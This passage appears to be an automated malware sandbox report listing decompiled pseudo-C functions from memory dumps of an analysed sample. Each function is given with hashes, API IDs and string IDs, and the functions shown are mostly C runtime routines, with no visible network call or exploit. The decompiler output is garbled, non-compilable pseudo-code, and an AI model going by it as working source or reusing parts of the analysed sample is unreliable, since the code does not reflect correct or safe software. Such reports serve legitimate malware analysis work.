                                                                                                                            				_a4372 = _a4372 + 1;
                                                                                                                            				if (_a4372 - 0x3e8 >= 0) goto 0xf8a8865d;
                                                                                                                            				_t150 = _t188 + 0x10f8 + _t148 * 0;
                                                                                                                            				E0000025B25BF8A879D0(_t117, _t119, _t188 + 0x10f8 + (_t188 + 0x10f8 + _t168 * 0) * 0, _t150,  &_a44);
                                                                                                                            				goto 0xf8a8860f;
                                                                                                                            				_a4372 = 0;
                                                                                                                            				goto 0xf8a8867a;
                                                                                                                            				_a4372 = _a4372 + 1;
                                                                                                                            				if (_a4372 - 0x10 >= 0) goto 0xf8a886ae;
                                                                                                                            				if (( *(_t188 + 0x10f8 + _t150 * 0 + _a4372) & 0x000000ff) == 0) goto 0xf8a886ac;
                                                                                                                            				goto 0xf8a886b5;
                                                                                                                            				goto 0xf8a8866a;
                                                                                                                            				goto L1;
                                                                                                                            				__eax = 0;
                                                                                                                            				__rdi = __rax;
                                                                                                                            				__rcx = __rsp;
                                                                                                                            				__rdx = L" Check Failure #%d - %s";
                                                                                                                            				__eax = E0000025B25BF8A88AFC(__rbx, __rsp, __rdx, __rsi);
                                                                                                                            				__rax = __rdi;
                                                                                                                            				__rcx = _a4396;
                                                                                                                            				__rcx = _a4396 ^ __rsp;
                                                                                                                            				__eax = E0000025B25BF8A81A50(__ecx, __rbx, _a4396 ^ __rsp, __rdx, __rdi, __rsi, __rbp, __r12);
                                                                                                                            				__rsp = __rsp + 0x1150;
                                                                                                                            				return __eax;
                                                                                                                            			}













                                                                                                                            0x25bf8a886c7
                                                                                                                            0x25bf8a886ca
                                                                                                                            0x25bf8a886d2
                                                                                                                            0x25bf8a886d5
                                                                                                                            0x25bf8a886da
                                                                                                                            0x25bf8a886e2

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckStackVars
                                                                                                                            • String ID: Check Failure #%d - %s$e quality of the resulting optimized code.
                                                                                                                            • API String ID: 3047416515-1761781716
                                                                                                                            • Opcode ID: 7cf6e32b5016d3f7ec797622aafe6f1297cc0b9e576a922faab2381133933de0
                                                                                                                            • Instruction ID: b7d1079fb961bf9be1dfd6019e2fc5948651098ccdf2d95845a4cccb47c422c2
                                                                                                                            • Opcode Fuzzy Hash: 7cf6e32b5016d3f7ec797622aafe6f1297cc0b9e576a922faab2381133933de0
                                                                                                                            • Instruction Fuzzy Hash: 06812E72304AC185EF25CB14EC993E9A2A4E788765F601436F79D86F94DB78C145CB24
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 27%
                                                                                                                            			E0000025B25BF8A7DB05(void* __eax, signed int __ecx, void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                                                                                                                            				void* _t84;
                                                                                                                            				void* _t85;
                                                                                                                            				intOrPtr _t103;
                                                                                                                            				void* _t117;
                                                                                                                            				void* _t135;
                                                                                                                            				long long _t138;
                                                                                                                            				intOrPtr* _t140;
                                                                                                                            				signed long long _t148;
                                                                                                                            				void* _t154;
                                                                                                                            				signed long long _t155;
                                                                                                                            				void* _t159;
                                                                                                                            				long long _t161;
                                                                                                                            				intOrPtr* _t162;
                                                                                                                            				void* _t164;
                                                                                                                            				void* _t165;
                                                                                                                            				void* _t169;
                                                                                                                            				intOrPtr* _t172;
                                                                                                                            				void* _t174;
                                                                                                                            				intOrPtr _t175;
                                                                                                                            				void* _t177;
                                                                                                                            				void* _t178;
                                                                                                                            				void* _t180;
                                                                                                                            				intOrPtr* _t181;
                                                                                                                            				void* _t183;
                                                                                                                            				void* _t185;
                                                                                                                            
                                                                                                                            				_t172 = __r9;
                                                                                                                            				asm("stc");
                                                                                                                            				asm("adc al, 0x7d");
                                                                                                                            				if (__eflags >= 0) goto 0x3f90ebd4;
                                                                                                                            				 *((intOrPtr*)(__rax - 0x73)) =  *((intOrPtr*)(__rax - 0x73)) + __ecx;
                                                                                                                            				 *(__rax - 1) =  *(__rax - 1) ^ __ecx;
                                                                                                                            				asm("int3");
                                                                                                                            				asm("int3");
                                                                                                                            				asm("int3");
                                                                                                                            				_t135 = _t164;
                                                                                                                            				 *((long long*)(_t135 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t135 + 0x10)) = _t161;
                                                                                                                            				 *((long long*)(_t135 + 0x18)) = __rsi;
                                                                                                                            				_t165 = _t164 - 0x40;
                                                                                                                            				_t175 =  *((intOrPtr*)(__r9 + 8));
                                                                                                                            				_t140 =  *((intOrPtr*)(__r9 + 0x38));
                                                                                                                            				_t185 =  *__r9 - _t175;
                                                                                                                            				_t181 = __r9;
                                                                                                                            				_t178 = __rdx;
                                                                                                                            				_t162 = __rcx;
                                                                                                                            				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0xf8a7dc3f;
                                                                                                                            				 *((long long*)(_t135 - 0x38)) = __rcx;
                                                                                                                            				 *((long long*)(_t135 - 0x30)) = __r8;
                                                                                                                            				if ( *((intOrPtr*)(__r9 + 0x48)) -  *_t140 >= 0) goto 0xf8a7dcdf;
                                                                                                                            				_t155 = _t154 + _t154;
                                                                                                                            				if (_t185 - _t135 < 0) goto 0xf8a7dc31;
                                                                                                                            				if (_t185 - _t135 >= 0) goto 0xf8a7dc31;
                                                                                                                            				if ( *((intOrPtr*)(_t140 + 0x10 + _t155 * 8)) == 0) goto 0xf8a7dc31;
                                                                                                                            				if ( *((intOrPtr*)(_t140 + 0xc + _t155 * 8)) == 1) goto 0xf8a7dbbd;
                                                                                                                            				_t117 =  *((long long*)(_t135 + _t175))(_t183, _t180, _t177, _t174, _t154);
                                                                                                                            				if (_t117 < 0) goto 0xf8a7dc38;
                                                                                                                            				if (_t117 <= 0) goto 0xf8a7dc31;
                                                                                                                            				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0xf8a7dbee;
                                                                                                                            				if ( *0xf8aa7488 == 0) goto 0xf8a7dbee;
                                                                                                                            				if (E0000025B25BF8A7E530(_t135 + _t175, _t140, 0xf8aa7488) == 0) goto 0xf8a7dbee;
                                                                                                                            				_t84 =  *0xf8aa7488();
                                                                                                                            				r8d = 1;
                                                                                                                            				_t85 = E0000025B25BF8A80030(_t84, _t162 + _t175, _t178);
                                                                                                                            				_t103 =  *((intOrPtr*)(_t140 + 0x10 + _t155 * 8));
                                                                                                                            				r9d =  *_t162;
                                                                                                                            				 *((long long*)(_t165 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
                                                                                                                            				_t138 =  *((intOrPtr*)(_t181 + 0x28));
                                                                                                                            				 *((long long*)(_t165 + 0x20)) = _t138;
                                                                                                                            				"x64"();
                                                                                                                            				E0000025B25BF8A80060(_t85);
                                                                                                                            				goto 0xf8a7db6d;
                                                                                                                            				goto 0xf8a7dce4;
                                                                                                                            				_t159 =  *((intOrPtr*)(_t172 + 0x20)) - _t175;
                                                                                                                            				goto 0xf8a7dcd5;
                                                                                                                            				_t148 = _t178 + _t178;
                                                                                                                            				if (_t185 - _t138 < 0) goto 0xf8a7dcd3;
                                                                                                                            				if (_t185 - _t138 >= 0) goto 0xf8a7dcd3;
                                                                                                                            				if (( *(_t162 + 4) & 0x00000020) == 0) goto 0xf8a7dcad;
                                                                                                                            				r9d = 0;
                                                                                                                            				if (_t103 == 0) goto 0xf8a7dca8;
                                                                                                                            				_t169 = _t140 + 8;
                                                                                                                            				if (_t159 - _t138 < 0) goto 0xf8a7dc9c;
                                                                                                                            				if (_t159 - _t138 >= 0) goto 0xf8a7dc9c;
                                                                                                                            				if ( *((intOrPtr*)(_t169 + 8)) !=  *((intOrPtr*)(_t140 + 0x10 + _t148 * 8))) goto 0xf8a7dc9c;
                                                                                                                            				if ( *((intOrPtr*)(_t169 + 4)) ==  *((intOrPtr*)(_t140 + 0xc + _t148 * 8))) goto 0xf8a7dca8;
                                                                                                                            				r9d = r9d + 1;
                                                                                                                            				if (r9d - _t103 < 0) goto 0xf8a7dc77;
                                                                                                                            				if (r9d != _t103) goto 0xf8a7dcdf;
                                                                                                                            				if ( *((intOrPtr*)(_t140 + 0x10 + _t148 * 8)) == 0) goto 0xf8a7dcbc;
                                                                                                                            				if (_t159 == _t138) goto 0xf8a7dcdf;
                                                                                                                            				goto 0xf8a7dcd3;
                                                                                                                            				 *((intOrPtr*)(_t181 + 0x48)) = _t155 + 1;
                                                                                                                            				r8d =  *((intOrPtr*)(_t140 + 0xc + _t148 * 8));
                                                                                                                            				 *((long long*)(_t169 + 0x10 + _t175))();
                                                                                                                            				if ( *((intOrPtr*)(_t172 + 0x48)) + 1 -  *_t140 < 0) goto 0xf8a7dc4f;
                                                                                                                            				return 1;
                                                                                                                            			}


                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable
                                                                                                                            • String ID: $csm
                                                                                                                            • API String ID: 3104724169-717980254
                                                                                                                            • Opcode ID: 6fd12170077310210e4a067a79524cced3896a0abe59c1130f854dc253b70f79
                                                                                                                            • Instruction ID: 1b07da501940f0f588ba3c65d5c9f4c2ab3c720e18ae12b4c19b82a6028e8e86
                                                                                                                            • Opcode Fuzzy Hash: 6fd12170077310210e4a067a79524cced3896a0abe59c1130f854dc253b70f79
                                                                                                                            • Instruction Fuzzy Hash: C751AB33211A4487EF16DB25EC0876D37A5F344BEAF248621FB6547B88EB74C841D728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$BoundaryDeleteDescriptor_errno_getptdfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1510257876-0
                                                                                                                            • Opcode ID: 02c19b759fbdd7880ccae27b06a304f9a90ecfe6e81f9b78119acf7dd140611f
                                                                                                                            • Instruction ID: 72576900ea5cd5cff0e5b0331b9961c3ce9a0f2b9b34b073dba06c389f28896f
                                                                                                                            • Opcode Fuzzy Hash: 02c19b759fbdd7880ccae27b06a304f9a90ecfe6e81f9b78119acf7dd140611f
                                                                                                                            • Instruction Fuzzy Hash: 39C18131628E048FEB6AEB289C8966573D0F756322F70416EF446C39B5DB38D8428B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID: B
                                                                                                                            • API String ID: 1812809483-1255198513
                                                                                                                            • Opcode ID: 8ebbda852f08801afd4fd4153bde0e27189db84ee19ab4da691e454773f2f5da
                                                                                                                            • Instruction ID: 525f80c83e561234398cd250340b49c391d8d565bb3bbd9ed59feb69f390f624
                                                                                                                            • Opcode Fuzzy Hash: 8ebbda852f08801afd4fd4153bde0e27189db84ee19ab4da691e454773f2f5da
                                                                                                                            • Instruction Fuzzy Hash: 95119D31218E088FDB54EB5898897A6B3D1FB98335F2447AEB019C32A1DB74D844CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E0000025B25BF8A796F0(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24) {
                                                                                                                            				intOrPtr _v32;
                                                                                                                            				signed long long _v40;
                                                                                                                            				intOrPtr _v48;
                                                                                                                            				signed int _v56;
                                                                                                                            				void* _t19;
                                                                                                                            				void* _t23;
                                                                                                                            				void* _t24;
                                                                                                                            				void* _t26;
                                                                                                                            				void* _t27;
                                                                                                                            				intOrPtr* _t30;
                                                                                                                            				intOrPtr* _t50;
                                                                                                                            				void* _t57;
                                                                                                                            				void* _t58;
                                                                                                                            
                                                                                                                            				_t39 = __rcx;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a79708;
                                                                                                                            				asm("int3");
                                                                                                                            				asm("int3");
                                                                                                                            				asm("int3");
                                                                                                                            				_t30 = _t50;
                                                                                                                            				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t30 + 0x10)) = __rbp;
                                                                                                                            				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                                            				 *(_t30 - 0x38) =  *(_t30 - 0x38) & 0x00000000;
                                                                                                                            				_t6 = _t39 + 0x28; // 0x28
                                                                                                                            				r8d = _t6;
                                                                                                                            				E0000025B25BF8A793C0(_t24, 0, _t26, _t27, _t30 - 0x30, __rcx, __r8);
                                                                                                                            				if (__rcx != 0) goto 0xf8a79756;
                                                                                                                            				_t19 = E0000025B25BF8A7B89C(_t30);
                                                                                                                            				 *_t30 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t19);
                                                                                                                            				goto 0xf8a79782;
                                                                                                                            				_v40 = _v40 & 0x00000000;
                                                                                                                            				_v56 = _v56 & 0x00000000;
                                                                                                                            				_v48 = 0x7fffffff;
                                                                                                                            				_v32 = 0x42;
                                                                                                                            				return E0000025B25BF8A7C154(_t23, 0, _v56, __rcx,  &_v56, __rcx, __r8, __rdx, _t57, _t58);
                                                                                                                            			}

















                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID: B
                                                                                                                            • API String ID: 1812809483-1255198513
                                                                                                                            • Opcode ID: 26844c6ebe7bd954f694562daa894dea154f98a279b34a78fd0845a724b23a57
                                                                                                                            • Instruction ID: e4e366285ba6bf5d151fe61c9e08939248f3c5f2720266939efeda1d56aa005d
                                                                                                                            • Opcode Fuzzy Hash: 26844c6ebe7bd954f694562daa894dea154f98a279b34a78fd0845a724b23a57
                                                                                                                            • Instruction Fuzzy Hash: EA1179B3620A4086EB119F12E84839DB661F798BE4F688221BB5807BD5CB3CC245DB18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E0000025B25BF8A883ED(void* __ecx, void* __edi, void* __esp, void* __rbx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r12, intOrPtr _a32, char _a64, signed int _a4388, signed int _a4392, signed int _a4408, signed int _a4416) {
                                                                                                                            				signed long long _t135;
                                                                                                                            				signed long long _t137;
                                                                                                                            				signed long long _t139;
                                                                                                                            				signed long long _t141;
                                                                                                                            				void* _t184;
                                                                                                                            				signed long long _t185;
                                                                                                                            
                                                                                                                            				_t184 = __rbp;
                                                                                                                            				_t183 = __rsi;
                                                                                                                            				_t145 = __rbx;
                                                                                                                            				_a4388 = _a4388 + 1;
                                                                                                                            				if (_a4388 - 3 >= 0) goto 0xf8a886b3;
                                                                                                                            				E0000025B25BF8A634DC(__rdx);
                                                                                                                            				_a4408 =  &M0000025B25BF8A967D0 + 4 + _a4388 * 0x44;
                                                                                                                            				r8d = 0;
                                                                                                                            				_a32 = E0000025B25BF8A86190( *((intOrPtr*)( &M0000025B25BF8A967D0 + _a4388 * 0x44)), __edi, __esp, _a4408, _a4408,  &_a64);
                                                                                                                            				if (_a32 == 0) goto 0xf8a8847c;
                                                                                                                            				goto 0xf8a886b5;
                                                                                                                            				E0000025B25BF8A87060(__edi, __esp,  &M0000025B25BF8A967D0 + 0x24 + _a4388 * 0x44, _t185 + 0x10f8 + _a4408 * 0,  &_a64);
                                                                                                                            				E0000025B25BF8A879D0(__edi, __esp, _t185 + 0x10f8 + ( &M0000025B25BF8A967D0 + 0x24 + _a4388 * 0x44) * 0, _t185 + _t185 + 0x10f8 + _a4408 * 0 + 0x10f8,  &_a64);
                                                                                                                            				r8d = 0x10;
                                                                                                                            				if (E0000025B25BF8A85160(0x10, _t185 + 0x10f8 +  &M0000025B25BF8A967D0 * 0,  &M0000025B25BF8A967D0 + 0x34 + _a4388 * 0x44,  &_a64) != 0) goto 0xf8a88557;
                                                                                                                            				_t135 =  &M0000025B25BF8A967D0 + 0x24 + _a4388 * 0x44;
                                                                                                                            				r8d = 0x10;
                                                                                                                            				if (E0000025B25BF8A85160(0x10, _t185 +  &M0000025B25BF8A967D0 + 0x10f8, _t135,  &_a64) == 0) goto 0xf8a88561;
                                                                                                                            				goto 0xf8a886b5;
                                                                                                                            				_a4392 = 0;
                                                                                                                            				goto 0xf8a8857e;
                                                                                                                            				_a4392 = _a4392 + 1;
                                                                                                                            				if (_a4392 - 0x10 >= 0) goto 0xf8a885a7;
                                                                                                                            				_t137 = _t185 + 0x10f8 + _t135 * 0;
                                                                                                                            				 *((char*)(_t137 + _a4392)) = 0;
                                                                                                                            				goto 0xf8a8856e;
                                                                                                                            				_a4392 = 0;
                                                                                                                            				goto 0xf8a885c4;
                                                                                                                            				_a4392 = _a4392 + 1;
                                                                                                                            				if (_a4392 - 0x3e8 >= 0) goto 0xf8a88602;
                                                                                                                            				_t139 = _t185 + 0x10f8 + _t137 * 0;
                                                                                                                            				E0000025B25BF8A87060(__edi, __esp, _t185 + 0x10f8 + _a4392 * 0, _t139,  &_a64);
                                                                                                                            				goto 0xf8a885b4;
                                                                                                                            				_a4392 = 0;
                                                                                                                            				goto 0xf8a8861f;
                                                                                                                            				_a4392 = _a4392 + 1;
                                                                                                                            				if (_a4392 - 0x3e8 >= 0) goto 0xf8a8865d;
                                                                                                                            				_t141 = _t185 + 0x10f8 + _t139 * 0;
                                                                                                                            				E0000025B25BF8A879D0(__edi, __esp, _t185 + 0x10f8 + (_t185 + 0x10f8 + _a4392 * 0) * 0, _t141,  &_a64);
                                                                                                                            				goto 0xf8a8860f;
                                                                                                                            				_a4392 = 0;
                                                                                                                            				goto 0xf8a8867a;
                                                                                                                            				_a4392 = _a4392 + 1;
                                                                                                                            				if (_a4392 - 0x10 >= 0) goto 0xf8a886ae;
                                                                                                                            				if (( *(_t185 + 0x10f8 + _t141 * 0 + _a4392) & 0x000000ff) == 0) goto 0xf8a886ac;
                                                                                                                            				goto 0xf8a886b5;
                                                                                                                            				goto 0xf8a8866a;
                                                                                                                            				goto E0000025B25BF8A883ED;
                                                                                                                            				E0000025B25BF8A88AFC(__rbx, _t185, L" Check Failure #%d - %s", __rsi);
                                                                                                                            				return E0000025B25BF8A81A50(0x10, _t145, _a4416 ^ _t185, L" Check Failure #%d - %s", _t185 + 0x10f8 + _t141 * 0, _t183, _t184, __r12);
                                                                                                                            			}










                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckStackVars
                                                                                                                            • String ID: Check Failure #%d - %s$e quality of the resulting optimized code.
                                                                                                                            • API String ID: 3047416515-1761781716
                                                                                                                            • Opcode ID: 29c5ee883b0c0bd846ee04512c9c0c763bb5dfad89d6c9b00d7fe1077a1954b2
                                                                                                                            • Instruction ID: 20a6d8b56ae5c70b7fa70858aac3466414431cff6527048b5ecc1b971c4cbaf7
                                                                                                                            • Opcode Fuzzy Hash: 29c5ee883b0c0bd846ee04512c9c0c763bb5dfad89d6c9b00d7fe1077a1954b2
                                                                                                                            • Instruction Fuzzy Hash: C7111C73308AC086DB29DB14FD993D9B3A1F788795F911122F68947E59DB38C505CB18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E0000025B25BF8A610C4(void* __edx, signed long long __rbx, void* __rcx, void* __r8) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* __rbp;
                                                                                                                            				void* __r12;
                                                                                                                            				signed long long _t51;
                                                                                                                            				long long _t53;
                                                                                                                            				long long _t66;
                                                                                                                            				long long _t71;
                                                                                                                            				void* _t82;
                                                                                                                            				void* _t84;
                                                                                                                            				signed long long _t85;
                                                                                                                            				long long _t88;
                                                                                                                            				void* _t94;
                                                                                                                            				int _t102;
                                                                                                                            
                                                                                                                            				_t63 = __rbx;
                                                                                                                            				 *((long long*)(_t84 + 0x20)) = __rbx;
                                                                                                                            				_push(_t94);
                                                                                                                            				_t82 = _t84 - 0xf0;
                                                                                                                            				_t85 = _t84 - 0x270;
                                                                                                                            				_t51 =  *0xf8a9c990; // 0x18002eb3c
                                                                                                                            				 *(_t82 + 0xe0) = _t51 ^ _t85;
                                                                                                                            				_t53 = __r8 + 0x28;
                                                                                                                            				_t66 = __r8 + 0x20;
                                                                                                                            				r12d = __edx;
                                                                                                                            				_t71 = __r8 + 0x30;
                                                                                                                            				_t88 = __r8 + 0x38;
                                                                                                                            				 *((long long*)(_t82 - 0x58)) = _t66;
                                                                                                                            				 *((long long*)(_t82 - 0x60)) = _t71;
                                                                                                                            				 *((long long*)(_t82 - 0x70)) = _t88;
                                                                                                                            				 *(_t85 + 0x40) = __rbx;
                                                                                                                            				 *((long long*)(_t85 + 0x38)) = _t53;
                                                                                                                            				 *((long long*)(_t85 + 0x30)) = _t66;
                                                                                                                            				 *((long long*)(_t85 + 0x28)) = _t71;
                                                                                                                            				 *((long long*)(_t85 + 0x20)) = _t88;
                                                                                                                            				 *((long long*)(_t82 - 0x80)) = _t53;
                                                                                                                            				 *((long long*)(_t82 - 0x50)) = __r8 + 0x40;
                                                                                                                            				 *((long long*)(_t82 - 0x68)) = __r8 + 0x10;
                                                                                                                            				if (E0000025B25BF8A63CD8(__r8 + 8, __r8 + 0x10, __r8 + 0x18, __r8 + 0x40) != 0) goto 0xf8a611cc;
                                                                                                                            				_t22 = _t63 + 1; // 0x1
                                                                                                                            				calloc(_t102);
                                                                                                                            				if (_t53 != 0) goto 0xf8a611f6;
                                                                                                                            				 *(_t85 + 0x40) =  *(_t85 + 0x40) & 0x00000000;
                                                                                                                            				 *((long long*)(_t85 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x80))));
                                                                                                                            				 *((long long*)(_t85 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x58))));
                                                                                                                            				 *((long long*)(_t85 + 0x28)) =  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x60))));
                                                                                                                            				 *((long long*)(_t85 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x70))));
                                                                                                                            				E0000025B25BF8A63D50( *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x68)))),  *((intOrPtr*)(__r8 + 8)),  *((intOrPtr*)(__r8 + 0x18)),  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x50)))));
                                                                                                                            				return E0000025B25BF8A81A50(_t22, __rbx,  *(_t82 + 0xe0) ^ _t85,  *((intOrPtr*)(__r8 + 8)), __r8,  *((intOrPtr*)(_t82 - 0x80)), _t82, _t94);
                                                                                                                            			}


















                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_calloc_implcalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4000150058-0
                                                                                                                            • Opcode ID: 3ab89f050e60a3aaf2f7de364a4cc34658e2925fb796430c95c3304d995e1cbf
                                                                                                                            • Instruction ID: 14a50245a42b53eb1bd9c57ed0988ace5e1c673c074a7bf00b454c253dd6191e
                                                                                                                            • Opcode Fuzzy Hash: 3ab89f050e60a3aaf2f7de364a4cc34658e2925fb796430c95c3304d995e1cbf
                                                                                                                            • Instruction Fuzzy Hash: 06C1E933604F858AEB61CF65E88439E7BA4F388B95F205129FA8D43F58DB38C455CB14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E01306040(long long __rax, long long __rbp, void* __r14, long long _a8) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				void* _t209;
                                                                                                                            				void* _t213;
                                                                                                                            				void* _t214;
                                                                                                                            				void* _t215;
                                                                                                                            				void* _t216;
                                                                                                                            				void* _t279;
                                                                                                                            				long long _t295;
                                                                                                                            				void* _t296;
                                                                                                                            				void* _t300;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t303 = __r14;
                                                                                                                            					if(_t300 >  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					E01356200(_t296, __rbp);
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t298 =  &_v8;
                                                                                                                            				_a8 = __rax;
                                                                                                                            				_t280 =  *((intOrPtr*)(__rax + 0x78));
                                                                                                                            				_v16 =  *((intOrPtr*)(__rax + 0x78));
                                                                                                                            				E01332340(_t296,  &_v8, __r14);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x1387115, _t279,  &_v8, __r14);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16, _t280,  &_v8, __r14);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216,  &_v8, __r14);
                                                                                                                            				L013323C0(_t296,  &_v8, __r14);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0x90));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x1387125, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0x90)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0x80));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x138712d, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0x80)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xb0));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x1387135, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xb0)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xa8));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x138714d, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xa8)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xa0));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x138711d, _t279, _t298, _t303);
